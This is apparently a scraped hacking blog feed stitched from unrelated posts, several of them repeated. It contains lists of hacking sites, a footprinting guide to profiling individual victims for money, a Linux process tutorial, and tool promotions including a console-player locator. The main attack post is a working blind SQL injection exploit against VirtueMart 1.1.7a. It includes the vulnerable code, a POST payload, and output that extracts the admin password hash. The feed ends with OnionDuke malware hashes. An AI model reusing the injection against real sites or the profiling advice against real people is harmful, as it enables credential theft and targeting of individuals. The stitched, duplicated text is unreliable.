- Hakin9: E-magazine offering in-depth looks at both attack and defense techniques and concentrates on difficult technical issues.
- The Hacker News: The Hacker News — most trusted and widely-acknowledged online cyber security news magazine with in-depth technical coverage for cybersecurity.
- Metasploit: Find security issues, verify vulnerability mitigations & manage security assessments with Metasploit. Get the worlds best penetration testing software now.
- Phrack Magazine: Digital hacking magazine.
- Exploit DB: An archive of exploits and vulnerable software by Offensive Security. The site collects exploits from submissions and mailing lists and concentrates them in a single database.
- Hacked Gadgets: A resource for DIY project documentation as well as general gadget and technology news.
- DEFCON: Information about the largest annual hacker convention in the US, including past speeches, video, archives, and updates on the next upcoming show as well as links and other details.
- NFOHump: Offers up-to-date .NFO files and reviews on the latest pirate software releases.
- SecTools.Org: List of 75 security tools based on a 2003 vote by hackers.
- SecurityFocus: Provides security information to all members of the security community, from end users, security hobbyists and network administrators to security consultants, IT Managers, CIOs and CSOs.
- KitPloit: Leading source of Security Tools, Hacking Tools, CyberSecurity and Network Security.
- HackRead: HackRead is a News Platform that centers on InfoSec, Cyber Crime, Privacy, Surveillance, and Hacking News with full-scale reviews on Social Media Platforms.
- Packet Storm: Information Security Services, News, Files, Tools, Exploits, Advisories and Whitepapers.
Tuesday, June 30, 2020
Top 13 Free Websites to Learn Hacking this 2018
Thursday, June 11, 2020
Footpriting is the technique used for gathering information about computer systems and the entities they belongs too.
To get this information, a hacker might use various tools and technologies.
Basically it is the first step where hacker gather as much information as possible to find the way for cracking the whole system or target or atleast decide what types of attacks will be more suitable for the target.
Footpriting can be both passive and active.
Reviewing a company's website is an example of passive footprinting,
whereas attempting to gain access to sensititve information through social engineering is an example of active information gathering.
During this phase hacking, a hacker can collect the following information>- Domain name
-IP Addresses
-Employee information
-Phone numbers
Job information
Tip-You can use http://www.whois.com/ website to get detailed information about a domain name information including its owner,its registrar, date of registration, expiry, name servers owner's contact information etc.
Use of Footprinting & Information Gathering in People Searching-
Now a days its very easy to find anyone with his/her full name in social media sites like Facebook, Instragram,Twitter,Linkdedin to gather information about date of birth,birthplace, real photos, education detail, hobbies, relationship status etc.
There are several sites like PIPL,PeekYou, Transport Sites such as mptransport,uptransport etc and Job placement Sites such as Shine.com,Naukari.com , Monster.com etc which are very useful for hacker to collect information about anyone.
Hacker collect the information about you from your Resume which you uploaded on job placement site for seeking a job as well as hacker collect the information from your vehicle number also from transport sites to know about the owner of vehicle, adderess etc then after they make plan how to attack on victim to earn money after know about him/her from collecting information.
INFORMATION GATHERING-It is the process of collecting the information from different places about any individual company,organization, server, ip address or person.
Most of the hacker spend his time in this process.
Information gathering plays a vital role for both investigating and attacking purposes.This is one of the best way to collect victim data and find the vulnerability and loopholes to get unauthorized modifications,deletion and unauthorized access.
More articlesFootpriting is the technique used for gathering information about computer systems and the entities they belongs too.
To get this information, a hacker might use various tools and technologies.
Basically it is the first step where hacker gather as much information as possible to find the way for cracking the whole system or target or atleast decide what types of attacks will be more suitable for the target.
Footpriting can be both passive and active.
Reviewing a company's website is an example of passive footprinting,
whereas attempting to gain access to sensititve information through social engineering is an example of active information gathering.
During this phase hacking, a hacker can collect the following information>- Domain name
-IP Addresses
-Employee information
-Phone numbers
Job information
Tip-You can use http://www.whois.com/ website to get detailed information about a domain name information including its owner,its registrar, date of registration, expiry, name servers owner's contact information etc.
Use of Footprinting & Information Gathering in People Searching-
Now a days its very easy to find anyone with his/her full name in social media sites like Facebook, Instragram,Twitter,Linkdedin to gather information about date of birth,birthplace, real photos, education detail, hobbies, relationship status etc.
There are several sites like PIPL,PeekYou, Transport Sites such as mptransport,uptransport etc and Job placement Sites such as Shine.com,Naukari.com , Monster.com etc which are very useful for hacker to collect information about anyone.
Hacker collect the information about you from your Resume which you uploaded on job placement site for seeking a job as well as hacker collect the information from your vehicle number also from transport sites to know about the owner of vehicle, adderess etc then after they make plan how to attack on victim to earn money after know about him/her from collecting information.
INFORMATION GATHERING-It is the process of collecting the information from different places about any individual company,organization, server, ip address or person.
Most of the hacker spend his time in this process.
Information gathering plays a vital role for both investigating and attacking purposes.This is one of the best way to collect victim data and find the vulnerability and loopholes to get unauthorized modifications,deletion and unauthorized access.
Linux Command Line Hackery Series - Part 5

Welcome back to the Linux Command Line Hackery series, this is Part-V of the series. Today we are going to learn how to monitor and control processes on our Linux box, so wrap your sleeves up and let's get started.
Command: ps
Syntax: ps [options]
Description: ps displays information about the currently running processes. Some of the common flags of ps are described briefly below
-A or -e -> select all processes
-a -> select all processes except both session leaders and processes not associated with a terminal.
T -> select all processes associated with current terminal
-u <username or id> -> select all processes of a given user or userlist
Open up a terminal and type ps:
what you'll see is a list of processes currently running in your terminal. One important thing to notice in the output is what's called as PID which stands for process ID. It is the number that uniquely identifies a process. Just keep that PID concept in mind we'll use it soon.
OK I know that's not really what you want to see rather you want to see all the processes that are currently running on your box. Don't worry we have flags to rescue, in order to see all the processes you can use the -e flag like this:
ps -e
Boom! you get a long list of processes currently running on your machine (don't stare at me like that, you asked and I gave you that). If you want to see processes of a particular user you can type the following command in your terminal:
ps -u bob
here "bob" is a username. This command will list all processes of the user with effective user name of bob.
You can do a full-format listing of the processes using the -f flag like this:
ps -fu bob
But the output of the ps command is a snapshot not really a live preview of what is going on in your box. I know your next question is going to be something like this, Isn't there a command in Linux that gives me a live updating information of the processes? Yes, there is a command called top that we'll learn about next.
Command: top
Syntax: top [options]
Description: top gives a dynamic real-time view of a running system. That is, it gives the up-to-date information about all the processes running on your Linux box (sounds fun!). Besides giving information about current processes and threads top also provides a brief system summary.
To start top just type this command:
and you'll get a nice and cute looking ugly display :). Well what the heck is going on here you might ask, right? What you get is information about what is going on with your computer. To see what more can you do with top just type <h> within the program window and you'll be given list of options that you can play with.
OK looking at what processes are going on in your box is cool but what if you want to terminate (or close) a process, is there a command line utility for that? Yes, there is and that's what we are going to look at next.
Command: kill
Syntax: kill [options] <pid> [...]
Description: kill is used to send a signal to process which by default is a TERM signal meaning kill by default sends a signal of termination to process (Cruel guy). To list the available signals we can use the -l or -L flag of the kill command.
To simply terminate a process we provide kill command a PID (process ID) and it will send the TERM signal to the process. So to kill a process first we'll list the running processes and then we'll keep the PID of the process in mind that we want to terminate. After that we'll issue the kill command with the PID that we just found.
ps -ax
kill 1153
the above command will send a TERM signal to the process whose PID is 1153, as simple as that.
We can also use our already learned skills to refine the output of ps command. Say we have a xterm terminal running on our box and we want to terminate it. By using ps command all alone we'll get a long listing of all processes running on our box. But we can limit the output of ps command to just those processes that we're interested in by piping ps command with the grep command like this:
ps -ax | grep xterm
wow! that's amazing, we're able to pull out only those results from the ps command that contained xterm in them. Isn't that a cool trick? But what is that vertical bar ( | ) doing in the middle, you may be thinking, right? Remember we learned about the input and output re-directors previously, the vertical bar (pipe in geeky terms) is another re-director whose task is to redirect the output of one command as input to another command. Here the pipe redirects the output of ps -ax command as input to grep command and of-course from the previous article you know that grep is used to search for a PATTERN in the given input. That means the above command searches for the xterm word in the output of ps -ax command and then displays just those lines of ps -ax command which contain xterm. Now get that PID and kill that process.
That's it for today, try these commands up on your own box and remember practice is gonna make you master the Linux command line. :)
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Wednesday, June 10, 2020
Web-fu - The Ultimate Web Hacking Chrome Extension
Web-fu Is a web hacking tool focused on discovering and exploiting web vulnerabilitites.
This tool has many advantages, as a browser-embedded webhacking tool, is very useful for scanning browser-authenticated applications, if browser can authenticate and access to the web application, the tool also can. Note that some other tools do not support neither certificate authentication nor web vpn accesses.
The integration with chrome, provides a more comfortable and agile way of web-hacking, and you have all the application data loaded on the hacking tool, you don't need to copy the url, cookies, etc. to the tool, just right click and hack.
The browser rendering engine is also used in this tool, to draw the html of the responses.
When I coded this tool, I was obsessed with false positives, which is the main problem in all detection tools. I have implemented a gauss algorithm, to reduce the faslse positives automatically which works very very well, and save a lot of time to the pentester.
Here is a video, with some of the web-fu functionalitites:
This tool has a visual crawler. Normal crawlers doesn't parse the ajvascript, this tool does. The visual crawler loads each link of the web site, rendering the html and executing all the javascript as a normal load, then the links are processed from he DOM and clicked.
A visual form cracker, is also available, althow is experimental and only works on some kind of forms.
The web-fu's portscanner, has a database of a common web ports, like 80,81,8080 and so on.
The cracker module, can bruteforce web directories to find new attack vectors, and can fuzz get and post parameters for discovering vulns, and also crack passwords. There are 9 preloaded wordlists, and you can also load a custom wordlist. Prefilters, falsepositive reductor and render will be helpful. The scanners support SSL, if the website can be loaded in the chrome, can be scanned by web-fu.
The supported encoders and decoders are: base64, urlescape and urlencode
A web notepad is available, saving the information on the browser localStorage, there is one notepad per site. A cookie editor is also very useful for pentesting. The inteceptor, is like a web proxy but from the inside of the browser, you can intercept a request There is also a session locker and a exploit web search.
Here is the link to the chrome store, the prize is about one euro, very cheap if you compare with other scanners: Web-Fu on Chrome Store
With webfu, you will do the best web site pentest and vulnerability assessment.
This tool has many advantages, as a browser-embedded webhacking tool, is very useful for scanning browser-authenticated applications, if browser can authenticate and access to the web application, the tool also can. Note that some other tools do not support neither certificate authentication nor web vpn accesses.
The integration with chrome, provides a more comfortable and agile way of web-hacking, and you have all the application data loaded on the hacking tool, you don't need to copy the url, cookies, etc. to the tool, just right click and hack.
The browser rendering engine is also used in this tool, to draw the html of the responses.
When I coded this tool, I was obsessed with false positives, which is the main problem in all detection tools. I have implemented a gauss algorithm, to reduce the faslse positives automatically which works very very well, and save a lot of time to the pentester.
Here is a video, with some of the web-fu functionalitites:
This tool has a visual crawler. Normal crawlers doesn't parse the ajvascript, this tool does. The visual crawler loads each link of the web site, rendering the html and executing all the javascript as a normal load, then the links are processed from he DOM and clicked.
A visual form cracker, is also available, althow is experimental and only works on some kind of forms.
The web-fu's portscanner, has a database of a common web ports, like 80,81,8080 and so on.
The cracker module, can bruteforce web directories to find new attack vectors, and can fuzz get and post parameters for discovering vulns, and also crack passwords. There are 9 preloaded wordlists, and you can also load a custom wordlist. Prefilters, falsepositive reductor and render will be helpful. The scanners support SSL, if the website can be loaded in the chrome, can be scanned by web-fu.
The supported encoders and decoders are: base64, urlescape and urlencode
A web notepad is available, saving the information on the browser localStorage, there is one notepad per site. A cookie editor is also very useful for pentesting. The inteceptor, is like a web proxy but from the inside of the browser, you can intercept a request There is also a session locker and a exploit web search.
Here is the link to the chrome store, the prize is about one euro, very cheap if you compare with other scanners: Web-Fu on Chrome Store
With webfu, you will do the best web site pentest and vulnerability assessment.
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Bit Banging Your Database
This post will be about stealing data from a database one bit at a time. Most of the time pulling data from a database a bit at a time would not be ideal or desirable, but in certain cases it will work just fine. For instance when dealing with a blind time based sql injection. To bring anyone who is not aware of what a "blind time based" sql injection is up to speed - this is a condition where it is possible to inject into a sql statement that is executed by the database, but the application gives no indication about the result of the query. This is normally exploited by injecting boolean statements into a query and making the database pause for a determined about of time before returning a response. Think of it as playing a game "guess who" with the database.
Now that we have the basic idea out of the way we can move onto how this is normally done and then onto the target of this post. Normally a sensitive item in the database is targeted, such as a username and password. Once we know where this item lives in the database we would first determine the length of the item, so for example an administrator's username. All examples below are being executed on an mysql database hosting a Joomla install. Since the example database is a Joomla web application database, we would want to execute a query like the following on the database:
Now that we have the basic idea out of the way we can move onto how this is normally done and then onto the target of this post. Normally a sensitive item in the database is targeted, such as a username and password. Once we know where this item lives in the database we would first determine the length of the item, so for example an administrator's username. All examples below are being executed on an mysql database hosting a Joomla install. Since the example database is a Joomla web application database, we would want to execute a query like the following on the database:
select length(username) from jos_users where usertype = 'Super Administrator';Because we can't return the value back directly we have to make a query like the following iteratively:
select if(length(username)=1,benchmark(5000000,md5('cc')),0) from jos_users where usertype = 'Super Administrator';
select if(length(username)=2,benchmark(5000000,md5('cc')),0) from jos_users where usertype = 'Super Administrator';
We would keep incrementing the number we compare the length of the username to until the database paused (benchmark function hit). In this case it would be 5 requests until our statement was true and the benchmark was hit.
Examples showing time difference:
mysql> select if(length(username)=1,benchmark(5000000,md5('cc')),0) from jos_users where usertype = 'Super Administrator';
1 row in set (0.00 sec)
mysql> select if(length(username)=5,benchmark(5000000,md5('cc')),0) from jos_users where usertype = 'Super Administrator';
1 row in set (0.85 sec)
Now in the instance of the password, the field is 65 characters long, so it would require 65 requests to discover the length of the password using this same technique. This is where we get to the topic of the post, we can actually determine the length of any field in only 8 requests (up to 255). By querying the value bit by bit we can determine if a bit is set or not by using a boolean statement again. We will use the following to test each bit of our value:
Start with checking the most significant bit and continue to the least significant bit, value is '65':
value & 128
value & 64
value & 32
value & 16
value & 8
value & 4
value & 2
value & 1
The items that have been highlighted in red identify where we would have a bit set (1), this is also the what we will use to satisfy our boolean statement to identify a 'true' statement. The following example shows the previous example being executed on the database, we identify set bits by running a benchmark to make the database pause:
mysql> select if(length(password) & 128,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)
mysql> select if(length(password) & 64,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (7.91 sec)
mysql> select if(length(password) & 32,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)
mysql> select if(length(password) & 16,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)
mysql> select if(length(password) & 8,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)
mysql> select if(length(password) & 4,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)
mysql> select if(length(password) & 2,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)
mysql> select if(length(password) & 1,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (8.74 sec)
As you can see, whenever we satisfy the boolean statement we get a delay in our response, we can mark that bit as being set (1) and all others as being unset (0). This gives us 01000001 or 65. Now that we have figured out how long our target value is we can move onto extracting its value from the database. Normally this is done using a substring function to move through the value character by character. At each offset we would test its value against a list of characters until our boolean statement was satisfied, indicating we have found the correct character. Example of this:
select if(substring(password,1,1)='a',benchmark(50000000,md5('cc')),0) as query from jos_users;This works but depending on how your character set that you are searching with is setup can effect how many requests it will take to find a character, especially when considering case sensitive values. Consider the following password hash:
da798ac6e482b14021625d3fad853337skxuqNW1GkeWWldHw6j1bFDHR4Av5SfLIf you searched for this string a character at a time using the following character scheme [0-9A-Za-z] it would take about 1400 requests. If we apply our previous method of extracting a bit at a time we will only make 520 requests (65*8). The following example shows the extraction of the first character in this password:
mysql> select if(ord(substring(password,1,1)) & 128,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (0.00 sec)
mysql> select if(ord(substring(password,1,1)) & 64,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (7.91 sec)
mysql> select if(ord(substring(password,1,1)) & 32,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (7.93 sec)
mysql> select if(ord(substring(password,1,1)) & 16,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (0.00 sec)
mysql> select if(ord(substring(password,1,1)) & 8,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (0.00 sec)
mysql> select if(ord(substring(password,1,1)) & 4,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (7.91 sec)
mysql> select if(ord(substring(password,1,1)) & 2,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (0.00 sec)
mysql> select if(ord(substring(password,1,1)) & 1,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (0.00 sec)
Again I have highlighted the requests where the bit was set in red. According to these queries the value is 01100100 (100) which is equal to 'd'. The offset of the substring would be incremented and the next character would be found until we reached the length of the value that we found earlier.
Now that the brief lesson is over we can move on to actually exploiting something using this technique. Our target is Virtuemart. Virtuemart is a free shopping cart module for the Joomla platform. Awhile back I had found an unauthenticated sql injection vulnerability in version 1.1.7a. This issue was fixed promptly by the vendor (...I was amazed) in version 1.1.8. The offending code was located in "$JOOMLA/administrator/components/com_virtuemart/notify.php" :
Now that the brief lesson is over we can move on to actually exploiting something using this technique. Our target is Virtuemart. Virtuemart is a free shopping cart module for the Joomla platform. Awhile back I had found an unauthenticated sql injection vulnerability in version 1.1.7a. This issue was fixed promptly by the vendor (...I was amazed) in version 1.1.8. The offending code was located in "$JOOMLA/administrator/components/com_virtuemart/notify.php" :
if($order_id === "" || $order_id === null)The $txn_id variable is set by a post variable of the same name. The following example will cause the web server to delay before returning:
$vmLogger->debug("Could not find order ID via invoice");
$vmLogger->debug("Trying to get via TransactionID: ".$txn_id);
$qv = "SELECT * FROM `#__{vm}_order_payment` WHERE `order_payment_trans_id` = '".$txn_id."'";
if( !$db->next_record()) {
$vmLogger->err("Error: No Records Found.");
POST /administrator/components/com_virtuemart/notify.php HTTP/1.0Now that an insertion point has been identified we can automate the extraction of the "Super Administrator" account from the system:
Content-Type: application/x-www-form-urlencoded
Content-Length: 56
invoice=1&txn_id=1' or benchmark(50000000,md5('cc'));#
python vm_own.py ""
[*] Getting string length
[+] username length is:5
[+] username:admin
[*] Getting string length
[+] password length is:65
[+] password:da798ac6e482b14021625d3fad853337:skxuqNW1GkeWWldHw6j1bFDHR4Av5SfLThe "vm_own.py" script can be downloaded here.
More information
Top 15 Best Operating System Professional Hackers Use

Top 15 Best Operating System Professional Hackers Use
Top 15 Best Operating System Professional Hackers Use
A hacker is someone who seeks and exploits the weaknesses of a computer system or network computing. Hackers may be motivated by a multitude of reasons, such as profit, protest, challenge, enjoyment or to assess these weaknesses to help in removing them.
The listed operating systems are based on the Linux kernel so it is all free operating systems.
1. Kali Linux
Kali Linux maintained and funded by Offensive Security Ltd. and it is first on our list. Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It was developed by Mati Aharoni and Devon Kearns of Offensive Security through rewriting BackTrack, its previous forensics Linux distribution based on Ubuntu. Kali Linux has a specific project for the withdrawal of compatibility and portability of Android-specific devices, called Kali Linux NetHunter. It is the first open test platform penetration Source for Nexus Android devices, created as a joint effort between the member of the Kali "BinkyBear" Security and offensive community. It supports Wireless 802.11 frame injection, one-click configurations MANA Evil access point, keyboard HID (Teensy as attacks), as well as attacks MITM USB Mala.
2. Back Box
Back Box is an evaluation penetration testing Linux distribution and Ubuntu-based security aimed at providing an analysis of computer network systems and toolkit. Desktop environment back box includes a complete set of tools needed for ethical hacking and security testing.
3. Parrot Security OS
Parrot Security OS is a GNU / Linux distribution based on Debian. Fue built in order to perform penetration tests (safety information), vulnerability assessment and mitigation, Computer Forensics and Anonymous Surfing. Ha been developed by the team of Frozen box.
Parrot is based on the stable branch (Jessie) of Debian, a Linux 4.1 kernel hardened customized with a branch grsecurity patched available. The desktop environment is MATE fork of Gnome 2, and the default display manager is LightDM. The project is certified to run on machines with 265MB of RAM minimum follow and it is suitable for both 32-bit (i386) and 64-bit (amd64), with a special edition that works on 32-bit machines of age (486). Moreover, the project is available for Armel and armhf architectures. It even offers an edition (both 32 bit and 64 bit) developed for servers only for pen testing cloud.
4. Live Hacking OS
Live Hacking OS is a Linux distribution packed with tools and utilities for ethical hacking, penetration testing, and countermeasure verification. It includes embedded GUI GNOME user. There is a second variation available which has only the command line and requires much fewer hardware requirements.
5. DEFT Linux
DEFT stands for Digital Evidence and Forensic Toolkit and it is a distribution of Linux open source software built around the DART (Toolkit for Advanced Response Digital) and is based on the Ubuntu operating system. It has been designed from scratch to offer some of the best computer forensics open source and incident response tools that can be used by individuals, IT auditors, investigators, military, and police.
6. Samurai Web Testing Framework
The Samurai Web Testing Framework is a live Linux environment which has been pre-configured to function as a web pen-testing environment. The CD contains the best of open source and free tools that focus on testing and websites that attack. In the development of this environment, it is based on our selection of tools that we use in our practice of security. Hence, it includes the tools that were used in the four steps of a pen-test web.
7. Network Security Toolkit
The Network Security Toolkit (NST) is a Live CD based on Linux that provides a set of security tools computing and open source network to carry out routine security tasks and diagnostic networks and tracing. The distribution can be used as an analysis of network security, validation and monitoring tool for servers hosting virtual machines. NST has management capabilities similar to Fedora packages and maintains its own repository of additional packages.
8. Bugtraq
Bugtraq is a mailing list dedicated to safety issues in computers. On-topic issues new discussions about vulnerabilities, security-related notices providers, operating methods, and how to fix them. This is a mailing list of large volume, and almost all new vulnerabilities are there. Bugtraq computer freaks and experienced developers are discussed, is available in Debian, Ubuntu and openSUSE 32 and 64-bit architectures.
9. NodeZero
NodeZero is an open source system based on the operating core derived from the most popular Linux distribution in the world, Ubuntu, and designed to be used for penetration testing operations. The distribution can be downloaded as an ISO image live DVD, which will also take place on computers that support both 32-bit (x86) and 64-bit (x86_64) instruction set. Besides the fact that it allows you to start the live system, start menu contains several advanced features such as the ability to perform a diagnostic test of system memory, boot from local disk options, start the installer directly and to start in safe graphics mode, text mode or in debug mode.
Default graphical desktop environment NodeZero is powered by GNOME, which uses the classic GNOME interface. It has a design of two panels and uses the default software repositories of Ubuntu.
10. Pentoo
Pentoo is a Live CD and Live USB OS designed for penetration testing and security assessment. It is based on Gentoo Linux, Pentoo is offered both as 32-bit and 64-bit live cd which is installable. Pentoo is also available as a superposition of an existing Gentoo installation. It has conductors packet injection patched wifi, GPGPU cracking software, and plenty of tools for penetration testing and security assessment. The kernel includes Pentoo grsecurity and PAX hardening and additional patches with the binary compiled from a string of hardened with the latest nightly versions of some tools that are available.
#11 Live Hacking OS
Well, this Linux distro actually comes with some useful hacking tools which are often used in penetration testing or ethical hacking purpose. Live Hacking OS consists of the GNOME inbuilt. The operating system is really easy to operate and it can work on less RAM.
#12 Knoppix STD
This is another best Linux distro which focuses on tools for computer security. Knoppix STD brings some advanced tools for Password cracking, Firewalls, Network Utilities, Honeypots, Wireless Networking and more. This is one of the most used operating systems for Hackers.
#13 Cyborg Hawk
Cyborg Hawk is a new operating system which is based on Ubuntu Linux. Well, lots of hackers talk about Cyborg hawk and its one of the most powerful and cutting-edge penetration testing distribution that has ever been created. The operating system houses more than 700 tools for different purposes.
#14 Blackbuntu
Well, this is another operating system which is based on Linux and it was specially developed for penetration testing. Well, the operating system is very famous amongst hackers and it offers an awesome platform to learn Information security.
#15 Weakerth4n
Well, this is another best operating system which is used by professional hackers. WeakerTh4n actually comes with lots of hacking tools and it's actually a modern operating system for WiFi Hacking. Some of the wireless tools include SQL Hacking, Password Cracking, WiFi attacks, Cisco exploitation and more.
OctoSniff is a network research tool that allows you to determine information about all the other players you're playing with. It is compatible with PS, XBox 360 and XBox One. It has many other features that make it a great sniffing tool. Some people think it might be a tool like Wireshark or Cain n Abel. No, it's not a tool like that. It simply sniffs players that let you know who's really playing. Download OctoSniff 2.0.3 full version. It's only for educational purposes to use.
- VPN Optimized
- Supports Wireless & Wired Spoofing
- Detects Geo IP and Complete Location
- Searches Usernames of Players in the Lobby
- Really easy to setup
Tuesday, June 9, 2020
OnionDuke Samples
File attributes
Size: 219136
MD5: 28F96A57FA5FF663926E9BAD51A1D0CB
Size: 126464
MD5: C8EB6040FD02D77660D19057A38FF769
Size: 316928
MD5: D1CE79089578DA2D41F1AD901F7B1014
Virustotal info
SHA256: 366affd094cc63e2c19c5d57a6866b487889dab5d1b07c084fff94262d8a390b
File name: 366affd094cc63e2c19c5d57a6866b487889dab5d1b07c084fff94262d8a390b
Detection ratio: 8 / 52
Analysis date: 2014-11-15 18:37:30 UTC ( 8 hours, 44 minutes ago )
Antivirus Result Update
Baidu-International Trojan.Win32.Agent.adYf 20141107
F-Secure Backdoor:W32/OnionDuke.B 20141115
Ikarus Trojan.Win32.Agent 20141115
Kaspersky Backdoor.Win32.MiniDuke.x 20141115
Norman OnionDuke.A 20141115
Sophos Troj/Ransom-ALA 20141115
Symantec Backdoor.Miniduke!gen4 20141115
Tencent Win32.Trojan.Agent.Tbsl 20141115
SHA256: 366affd094cc63e2c19c5d57a6866b487889dab5d1b07c084fff94262d8a390b
File name: 366affd094cc63e2c19c5d57a6866b487889dab5d1b07c084fff94262d8a390b
Detection ratio: 8 / 52
Antivirus Result Update
Baidu-International Trojan.Win32.Agent.adYf 20141107
F-Secure Backdoor:W32/OnionDuke.B 20141115
Ikarus Trojan.Win32.Agent 20141115
Kaspersky Backdoor.Win32.MiniDuke.x 20141115
Norman OnionDuke.A 20141115
Sophos Troj/Ransom-ALA 20141115
Symantec Backdoor.Miniduke!gen4 20141115
Tencent Win32.Trojan.Agent.Tbsl 20141115
SHA256: 0102777ec0357655c4313419be3a15c4ca17c4f9cb4a440bfb16195239905ade
File name: 0102777ec0357655c4313419be3a15c4ca17c4f9cb4a440bfb16195239905ade
Detection ratio: 19 / 55
Analysis date: 2014-11-15 18:37:25 UTC ( 8 hours, 47 minutes ago )
Antivirus Result Update
AVware Trojan.Win32.Generic!BT 20141115
Ad-Aware Backdoor.Generic.933739 20141115
Baidu-International Trojan.Win32.OnionDuke.BA 20141107
BitDefender Backdoor.Generic.933739 20141115
ESET-NOD32 a variant of Win32/OnionDuke.A 20141115
Emsisoft Backdoor.Generic.933739 (B) 20141115
F-Secure Backdoor:W32/OnionDuke.A 20141115
GData Backdoor.Generic.933739 20141115
Ikarus Trojan.Win32.Onionduke 20141115
Kaspersky Backdoor.Win32.MiniDuke.x 20141115
McAfee RDN/Generic BackDoor!zw 20141115
McAfee-GW-Edition BehavesLike.Win32.Trojan.fh 20141114
MicroWorld-eScan Backdoor.Generic.933739 20141115
Norman OnionDuke.B 20141115
Sophos Troj/Ransom-ANU 20141115
Symantec Backdoor.Miniduke!gen4 20141115
TrendMicro BKDR_ONIONDUKE.AD 20141115
TrendMicro-HouseCall BKDR_ONIONDUKE.AD 20141115
VIPRE Trojan.Win32.Generic!BT 20141115
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